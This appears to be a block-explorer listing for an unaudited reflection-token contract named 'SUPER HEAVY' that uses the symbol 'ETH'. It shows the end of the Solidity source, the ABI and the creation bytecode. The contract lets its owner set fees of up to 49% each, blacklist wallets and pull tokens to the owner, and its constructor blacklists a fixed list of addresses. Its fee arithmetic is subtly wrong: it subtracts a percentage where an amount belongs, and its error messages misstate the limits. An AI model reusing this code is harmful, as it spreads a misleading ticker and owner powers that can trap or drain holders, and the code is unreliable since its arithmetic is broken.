_tOwned[sender] = _tOwned[sender].sub(tAmount); _rOwned[sender] = _rOwned[sender].sub(rAmount); _rOwned[recipient] = _rOwned[recipient].add(rTransferAmount); _takeMarketingLiquidity(tMarketingLiquidity); _reflectFee(rFee, tFee); emit Transfer(sender, recipient, tTransferAmount); } function _transferBothExcluded(address sender, address recipient, uint256 tAmount) private { (uint256 rAmount, uint256 rTransferAmount, uint256 rFee, uint256 tTransferAmount, uint256 tFee, uint256 tMarketingLiquidity) = _getValues(tAmount); _tOwned[sender] = _tOwned[sender].sub(tAmount); _rOwned[sender] = _rOwned[sender].sub(rAmount); _tOwned[recipient] = _tOwned[recipient].add(tTransferAmount); _rOwned[recipient] = _rOwned[recipient].add(rTransferAmount); _takeMarketingLiquidity(tMarketingLiquidity); _reflectFee(rFee, tFee); emit Transfer(sender, recipient, tTransferAmount); } function _takeMarketingLiquidity(uint256 tMarketingLiquidity) private { uint256 currentRate = _getRate(); uint256 rMarketingLiquidity = tMarketingLiquidity.mul(currentRate); _rOwned[address(this)] = _rOwned[address(this)].add(rMarketingLiquidity); if(_isExcluded[address(this)]) _tOwned[address(this)] = _tOwned[address(this)].add(tMarketingLiquidity); } function _reflectFee(uint256 rFee, uint256 tFee) private { _rTotal = _rTotal.sub(rFee); _tFeeTotal = _tFeeTotal.add(tFee); } //to recieve ETH from uniswapV2Router when swapping receive() external payable {} function _getValues(uint256 tAmount) private view returns (uint256, uint256, uint256, uint256, uint256, uint256) { (uint256 tTransferAmount, uint256 tFee, uint256 tMarketingLiquidityFee) = _getTValues(tAmount, _taxFee, _marketingFee.add(_liquidityFee)); uint256 currentRate = _getRate(); (uint256 rAmount, uint256 rTransferAmount, uint256 rFee) = _getRValues(tAmount, tFee, currentRate); return (rAmount, rTransferAmount, rFee, tTransferAmount, tFee, tMarketingLiquidityFee); } function _getTValues(uint256 tAmount, uint256 taxFee, uint256 marketingLiquidityFee) private pure returns (uint256, uint256, uint256) { uint256 tFee = tAmount.mul(taxFee).div(100); uint256 tMarketingLiquidityFee = tAmount.mul(marketingLiquidityFee).div(100); uint256 tTransferAmount = tAmount.sub(tFee).sub(marketingLiquidityFee); return (tTransferAmount, tFee, tMarketingLiquidityFee); } function _getRValues(uint256 tAmount, uint256 tFee, uint256 currentRate) private pure returns (uint256, uint256, uint256) { uint256 rAmount = tAmount.mul(currentRate); uint256 rFee = tFee.mul(currentRate); uint256 rTransferAmount = rAmount.sub(rFee); return (rAmount, rTransferAmount, rFee); } function _getRate() private view returns(uint256) { (uint256 rSupply, uint256 tSupply) = _getCurrentSupply(); return rSupply.div(tSupply); } function _getCurrentSupply() private view returns(uint256, uint256) { uint256 rSupply = _rTotal; uint256 tSupply = _tTotal; for (uint256 i = 0; i < _excluded.length; i++) { if (_rOwned[_excluded[i]] > rSupply || _tOwned[_excluded[i]] > tSupply) return (_rTotal, _tTotal); rSupply = rSupply.sub(_rOwned[_excluded[i]]); tSupply = tSupply.sub(_tOwned[_excluded[i]]); } if (rSupply < _rTotal.div(_tTotal)) return (_rTotal, _tTotal); return (rSupply, tSupply); } function _getTaxFee() private view returns(uint256) { return _taxFee; } function _getMaxTxAmount() private view returns(uint256) { return _maxTxAmount; } function _getETHBalance() public view returns(uint256 balance) { return address(this).balance; } function _setTaxFee(uint256 taxFee) external onlyOwner() { require(taxFee >= 1 && taxFee <= 49, 'taxFee should be in 1 - 49'); _taxFee = taxFee; } function _setMarketingFee(uint256 marketingFee) external onlyOwner() { require(marketingFee >= 1 && marketingFee <= 49, 'marketingFee should be in 1 - 11'); _marketingFee = marketingFee; } function _setLiquidityFee(uint256 liquidityFee) external onlyOwner() { require(liquidityFee >= 1 && liquidityFee <= 49, 'liquidityFee should be in 1 - 11'); _liquidityFee = liquidityFee; } function _setNumTokensSellToAddToLiquidity(uint256 numTokensSellToAddToLiquidity) external onlyOwner() { require(numTokensSellToAddToLiquidity >= 10**9 , 'numTokensSellToAddToLiquidity should be greater than total 1e9'); _numTokensSellToAddToLiquidity = numTokensSellToAddToLiquidity; } function _setMaxTxAmount(uint256 maxTxAmount) external onlyOwner() { require(maxTxAmount >= 10**9 , 'maxTxAmount should be greater than total 1e9'); _maxTxAmount = maxTxAmount; } function recoverTokens(uint256 tokenAmount) public virtual onlyOwner() { _approve(address(this), owner(), tokenAmount); _transfer(address(this), owner(), tokenAmount); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"minTokensBeforeSwap","type":"uint256"}],"name":"MinTokensBeforeSwapUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiqudity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"bool","name":"enabled","type":"bool"}],"name":"SwapAndLiquifyEnabledUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_getETHBalance","outputs":[{"internalType":"uint256","name":"balance","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"liquidityFee","type":"uint256"}],"name":"_setLiquidityFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"marketingFee","type":"uint256"}],"name":"_setMarketingFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"maxTxAmount","type":"uint256"}],"name":"_setMaxTxAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"numTokensSellToAddToLiquidity","type":"uint256"}],"name":"_setNumTokensSellToAddToLiquidity","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"taxFee","type":"uint256"}],"name":"_setTaxFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"addBotToBlackList","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"tAmount","type":"uint256"}],"name":"deliver","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"excludeFromReward","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"includeInReward","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFee","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromReward","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"manualSend","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"manualSwap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenAmount","type":"uint256"}],"name":"recoverTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"tAmount","type":"uint256"},{"internalType":"bool","name":"deductTransferFee","type":"bool"}],"name":"reflectionFromToken","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"removeBotFromBlackList","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"setExcludeFromFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"_swapAndLiquifyEnabled","type":"bool"}],"name":"setSwapAndLiquifyEnabled","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapAndLiquifyEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"rAmount","type":"uint256"}],"name":"tokenFromReflection","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
60c060405269152d02c7e14af6800000600b55600b54600019816200002057fe5b0660001903600c556040518060400160405280600381526020017f4554480000000000000000000000000000000000000000000000000000000000815250600e9080519060200190620000759291906200125d565b506040518060400160405280600c81526020017f5355504552204845415659200000000000000000000000000000000000000000815250600f9080519060200190620000c39291906200125d565b506009601060006101000a81548160ff021916908360ff160217905550600060115560016012556003601355601154601455601254601555601354601655739e760657388b9801251e3a8605331e0ce2581879601760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506000601760146101000a81548160ff0219169083151502179055506001601760156101000a81548160ff021916908315150217905550600b54601855670de0b6b3a7640000601955734beac524c7ab27e38dee80ff6c9df8ba13c94330601a60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503480156200020057600080fd5b506000620002136200122c60201b60201c565b9050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a350600c5460036000620002c86200122c60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506000737a250d5630b4cf539739df2c5dacb4c659f2488d90508073ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b815260040160206040518083038186803b1580156200036657600080fd5b505afa1580156200037b573d6000803e3d6000fd5b505050506040513d60208110156200039257600080fd5b810190808051906020019092919050505073ffffffffffffffffffffffffffffffffffffffff1663c9c65396308373ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b815260040160206040518083038186803b1580156200040657600080fd5b505afa1580156200041b573d6000803e3d6000fd5b505050506040513d60208110156200043257600080fd5b81019080805190602001909291905050506040518363ffffffff1660e01b8152600401808373ffffffffffffffffffffffffffffffffffffffff1681526020018273ffffffffffffffffffffffffffffffffffffffff16815260200192505050602060405180830381600087803b158015620004ad57600080fd5b505af1158015620004c2573d6000803e3d6000fd5b505050506040513d6020811015620004d957600080fd5b810190808051906020019092919050505073ffffffffffffffffffffffffffffffffffffffff1660a08173ffffffffffffffffffffffffffffffffffffffff1660601b815250508073ffffffffffffffffffffffffffffffffffffffff1660808173ffffffffffffffffffffffffffffffffffffffff1660601b815250506001600660006200056d6200123460201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600660003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600160066000601760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600160066000601a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555060016009600073e031b36b53e53a292a20c5f08fd1658cddf74fce73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600a73e031b36b53e53a292a20c5f08fd1658cddf74fce9080600181540180825580915050600190039060005260206000200160009091909190916101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060016009600073e516bdee55b0b4e9bacaf6285130de15589b134573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600a73e516bdee55b0b4e9bacaf6285130de15589b13459080600181540180825580915050600190039060005260206000200160009091909190916101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060016009600073a1cec245c456dd1bd9f2815a6955fef44eb4191b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600a73a1cec245c456dd1bd9f2815a6955fef44eb4191b9080600181540180825580915050600190039060005260206000200160009091909190916101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060016009600073d7d3ee77d35d0a56f91542d4905b1a2b1cd7cf9573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600a73d7d3ee77d35d0a56f91542d4905b1a2b1cd7cf959080600181540180825580915050600190039060005260206000200160009091909190916101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060016009600073fe76f05dc59fec04184fa0245ad0c3cf9a57b96473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600a73fe76f05dc59fec04184fa0245ad0c3cf9a57b9649080600181540180825580915050600190039060005260206000200160009091909190916101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060016009600073dc81a3450817a58d00f45c86d0368290088db84873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600a73dc81a3450817a58d00f45c86d0368290088db8489080600181540180825580915050600190039060005260206000200160009091909190916101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600160096000735f186b080f5634bba9dc9683bc37d192ee96e2cf73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600a735f186b080f5634bba9dc9683bc37d192ee96e2cf9080600181540180825580915050600190039060005260206000200160009091909190916101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506001600960007374de5d4fcbf63e00296fd95d33236b979401663173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600a7374de5d4fcbf63e00296fd95d33236b97940166319080600181540180825580915050600190039060005260206000200160009091909190916101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506001600960007336c1c59dcca0fd4a8c28551f7b2fe6421d53ce3273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600a7336c1c59dcca0fd4a8c28551f7b2fe6421d53ce329080600181540180825580915050600190039060005260206000200160009091909190916101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060016009600073a3e2b5588c2a42b8fd6b90dc7055dc118e17ff1f73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600a73a3e2b5588c2a42b8fd6b90dc7055dc118e17ff1f9080600181540180825580915050600190039060005260206000200160009091909190916101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506001600960007345fd07c63e5c316540f14b2002b085aee78e388173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600a7345fd07c63e5c316540f14b2002b085aee78e38819080600181540180825580915050600190039060005260206000200160009091909190916101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506001600960007327f9adb26d532a41d97e00206114e429ad58c67973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600a7327f9adb26d532a41d97e00206114e429ad58c6799080600181540180825580915050600190039060005260206000200160009091909190916101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620011be6200122c60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600b546040518082815260200191505060405180910390a35062001303565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f10620012a057805160ff1916838001178555620012d1565b82800160010185558215620012d1579182015b82811115620012d0578251825591602001919060010190620012b3565b5b509050620012e09190620012e4565b5090565b5b80821115620012ff576000816000905550600101620012e5565b5090565b60805160601c60a05160601c615aa86200135560003980611cdb528061375052806138d65280613a5c525080610e885280613e9c5280613f885280613faf5280614aa15280614ac85250615aa86000f3fe6080604052600436106102295760003560e01c806352390c0211610123578063a457c2d7116100ab578063c49b9a801161006f578063c49b9a8014610c67578063dd62ed3e14610ca4578063f2fde38b14610d29578063f429389014610d7a578063f815a84214610d9157610230565b8063a457c2d714610ab2578063a52fe9bb14610b23578063a9059cbb14610b5e578063af9549e014610bcf578063bcd6d44614610c2c57610230565b8063715018a6116100f2578063715018a6146109125780637ded4d6a1461092957806388f820201461097a5780638da5cb5b146109e157806395d89b4114610a2257610230565b806352390c02146107ba5780635342acb41461080b5780635880b8731461087257806370a08231146108ad57610230565b806330599fc5116101b15780634303443d116101755780634303443d146106895780634549b039146106da57806349bd5a5e146107355780634a74bb021461077657806351bc3c85146107a357610230565b806330599fc514610523578063313ce5671461055e5780633685d4191461058c57806339509351146105dd5780633bd5d1731461064e57610230565b806318160ddd116101f857806318160ddd146103a25780631bbae6e0146103cd5780631decaadc1461040857806323b872dd146104435780632d838119146104d457610230565b806306fdde0314610235578063095ea7b3146102c557806313114a9d146103365780631694505e1461036157610230565b3661023057005b600080fd5b34801561024157600080fd5b5061024a610dbc565b6040518080602001828103825283818151815260200191508051906020019080838360005b8381101561028a57808201518184015260208101905061026f565b50505050905090810190601f1680156102b75780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b3480156102d157600080fd5b5061031e600480360360408110156102e857600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610e5e565b60405180821515815260200191505060405180910390f35b34801561034257600080fd5b5061034b610e7c565b6040518082815260200191505060405180910390f35b34801561036d57600080fd5b50610376610e86565b604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b3480156103ae57600080fd5b506103b7610eaa565b6040518082815260200191505060405180910390f35b3480156103d957600080fd5b50610406600480360360208110156103f057600080fd5b8101908080359060200190929190505050610eb4565b005b34801561041457600080fd5b506104416004803603602081101561042b57600080fd5b8101908080359060200190929190505050610fe3565b005b34801561044f57600080fd5b506104bc6004803603606081101561046657600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050611112565b60405180821515815260200191505060405180910390f35b3480156104e057600080fd5b5061050d600480360360208110156104f757600080fd5b81019080803590602001909291905050506111eb565b6040518082815260200191505060405180910390f35b34801561052f57600080fd5b5061055c6004803603602081101561054657600080fd5b810190808035906020019092919050505061126f565b005b34801561056a57600080fd5b5061057361135e565b604051808260ff16815260200191505060405180910390f35b34801561059857600080fd5b506105db600480360360208110156105af57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050611375565b005b3480156105e957600080fd5b506106366004803603604081101561060057600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291905050506116ff565b60405180821515815260200191505060405180910390f35b34801561065a57600080fd5b506106876004803603602081101561067157600080fd5b81019080803590602001909291905050506117b2565b005b34801561069557600080fd5b506106d8600480360360208110156106ac57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050611943565b005b3480156106e657600080fd5b5061071f600480360360408110156106fd57600080fd5b8101908080359060200190929190803515159060200190929190505050611c22565b6040518082815260200191505060405180910390f35b34801561074157600080fd5b5061074a611cd9565b604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b34801561078257600080fd5b5061078b611cfd565b60405180821515815260200191505060405180910390f35b3480156107af57600080fd5b506107b8611d10565b005b3480156107c657600080fd5b50610809600480360360208110156107dd57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050611df1565b005b34801561081757600080fd5b5061085a6004803603602081101561082e57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff1690602001909291905050506121a4565b60405180821515815260200191505060405180910390f35b34801561087e57600080fd5b506108ab6004803603602081101561089557600080fd5b81019080803590602001909291905050506121fa565b005b3480156108b957600080fd5b506108fc600480360360208110156108d057600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050612350565b6040518082815260200191505060405180910390f35b34801561091e57600080fd5b5061092761243b565b005b34801561093557600080fd5b506109786004803603602081101561094c57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff1690602001909291905050506125c1565b005b34801561098657600080fd5b506109c96004803603602081101561099d57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050612906565b60405180821515815260200191505060405180910390f35b3480156109ed57600080fd5b506109f661295c565b604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b348015610a2e57600080fd5b50610a37612985565b6040518080602001828103825283818151815260200191508051906020019080838360005b83811015610a77578082015181840152602081019050610a5c565b50505050905090810190601f168015610aa45780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b348015610abe57600080fd5b50610b0b60048036036040811015610ad557600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050612a27565b60405180821515815260200191505060405180910390f35b348015610b2f57600080fd5b50610b5c60048036036020811015610b4657600080fd5b8101908080359060200190929190505050612af4565b005b348015610b6a57600080fd5b50610bb760048036036040811015610b8157600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050612c4a565b60405180821515815260200191505060405180910390f35b348015610bdb57600080fd5b50610c2a60048036036040811015610bf257600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803515159060200190929190505050612c68565b005b348015610c3857600080fd5b50610c6560048036036020811015610c4f57600080fd5b8101908080359060200190929190505050612d8b565b005b348015610c7357600080fd5b50610ca260048036036020811015610c8a57600080fd5b81019080803515159060200190929190505050612ee1565b005b348015610cb057600080fd5b50610d1360048036036040811015610cc757600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050612fc6565b6040518082815260200191505060405180910390f35b348015610d3557600080fd5b50610d7860048036036020811015610d4c57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919050505061304d565b005b348015610d8657600080fd5b50610d8f613258565b005b348015610d9d57600080fd5b50610da6613331565b6040518082815260200191505060405180910390f35b6060600e8054600181600116156101000203166002900480601f016020809104026020016040519081016040528092919081815260200182805460018160011615610100020316600290048015610e545780601f10610e2957610100808354040283529160200191610e54565b820191906000526020600020905b815481529060010190602001808311610e3757829003601f168201915b5050505050905090565b6000610e72610e6b613339565b8484613341565b6001905092915050565b6000600d54905090565b7f000000000000000000000000000000000000000000000000000000000000000081565b6000600b54905090565b610ebc613339565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610f7c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b633b9aca00811015610fd9576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602c8152602001806158b7602c913960400191505060405180910390fd5b8060188190555050565b610feb613339565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146110ab576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b633b9aca00811015611108576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252603e8152602001806159c2603e913960400191505060405180910390fd5b8060198190555050565b600061111f848484613538565b6111e08461112b613339565b6111db8560405180606001604052806028815260200161590460289139600560008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000611191613339565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613b849092919063ffffffff16565b613341565b600190509392505050565b6000600c54821115611248576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602a8152602001806157ee602a913960400191505060405180910390fd5b6000611252613c44565b90506112678184613c6f90919063ffffffff16565b915050919050565b611277613339565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611337576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657281525060200191505060405180910390fd5b6113493061134361295c565b83613341565b61135b3061135561295c565b83613538565b50565b6000601060009054906101000a900460ff16905090565b61137d613339565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461143d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260208152602001807f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572815250602